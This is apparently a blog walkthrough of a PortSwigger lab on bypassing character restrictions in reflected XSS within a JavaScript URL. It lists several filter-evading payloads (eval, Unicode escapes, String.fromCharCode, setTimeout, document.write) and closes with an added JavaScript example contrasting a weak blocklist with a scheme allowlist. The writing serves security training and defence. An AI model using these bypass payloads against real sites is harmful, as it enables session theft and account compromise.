Bypassing Character Restrictions in Reflected XSS - PortSwigger Lab Walkthrough

Hacker2255
2 min read

Introduction

This lab demonstrates how some applications attempt to block certain characters to prevent XSS but still fail because of bypass techniques.

Lab Overview

This lab reflects user input in a JavaScript URL context. However, some characters are blocked to mitigate XSS attacks. Our goal is to execute alert(1337) by bypassing these restrictions.

Identifying the Vulnerability

  1. The application reflects user input in a JavaScript URL.

  2. Some special characters are blocked.

  3. We need to find a bypass to execute JavaScript successfully.

Testing Basic XSS Payloads

We first test a basic JavaScript payload:

javascript:alert(1337)

If the alert() function or some characters are blocked, we try:

javascript:eval('alert(1337)')

Or Unicode encoding to bypass filters:

javascript:\u0061\u006c\u0065\u0072\u0074(1337)

Finding a Working Bypass

If the alert keyword or certain characters are blocked, we use alternative execution methods:

  1. Using String.fromCharCode

    javascript:window[String.fromCharCode(97, 108, 101, 114, 116)](1337)

  2. Using setTimeout

    javascript:setTimeout('alert(1337)')

  3. Using document.write

    javascript:document.write('<script>alert(1337)<\/script>')

Executing the Attack

  1. Identify which characters are blocked.

  2. Modify the payload to bypass filters.

  3. Inject the payload into the vulnerable parameter.

  4. Execute the XSS attack successfully.

Copy the lab ID and paste it into the given payload below:

Understanding the Impact

This vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:

  1. Cookie theft using document.cookie

  2. Session hijacking

  3. Phishing attacks

  4. Keylogging or defacement attacks

Conclusion

Even though developers try to block certain characters to prevent XSS, attackers can still find creative ways to bypass these restrictions. This lab teaches us the importance of proper output encoding and context-aware sanitization in preventing XSS.
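As an added example (not part of the original post or of the PortSwigger lab), the code below shows why a character blocklist does not protect a JavaScript URL sink and what replaces it: the browser's URL parser decides the scheme, so the defence is to allowlist http/https on the parsed protocol rather than to strip characters. The function names and the sample inputs are this example's own; the payloads are the ones listed in the walkthrough.

```javascript
// Added example, not from the post or the lab. Function names are this example's own.

// The weak approach this lab models: strip a few "dangerous" characters from
// the user-supplied value before it is written into an href attribute.
function blocklistFilter(input) {
  return input.replace(/[<>"']/g, "");
}

// Scheme of the value as the browser's URL parser sees it (null if unparsable).
// The parser lowercases the scheme and strips leading whitespace, tabs and
// newlines, so string matching on the raw value is not what the browser does.
function schemeOf(input) {
  try {
    return new URL(input).protocol;
  } catch (e) {
    return null;
  }
}

// Payloads from the walkthrough above (constructed test input for this example).
const WALKTHROUGH_PAYLOADS = [
  "javascript:alert(1337)",
  "javascript:eval('alert(1337)')",
  "javascript:\\u0061\\u006c\\u0065\\u0072\\u0074(1337)",
  "javascript:setTimeout('alert(1337)')",
];

// Returns the payloads that still carry a javascript: scheme after filtering.
// Removing quotes does not change the scheme, so the blocklist passes all of them.
function survivesBlocklist(payloads) {
  return payloads.filter((p) => schemeOf(blocklistFilter(p)) === "javascript:");
}

// Hardened approach: allowlist the parsed protocol instead of blocklisting
// characters. Anything unparsable or not http/https becomes an inert value.
// (Relative links are out of scope here; pass a base URL to new URL() if needed.)
function safeUrl(input) {
  let parsed;
  try {
    parsed = new URL(input);
  } catch (e) {
    return "about:blank";
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return "about:blank";
  }
  return parsed.href;
}
```

The value returned by safeUrl still needs HTML attribute encoding when it is written into the page; the scheme allowlist and the output encoding are separate controls.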
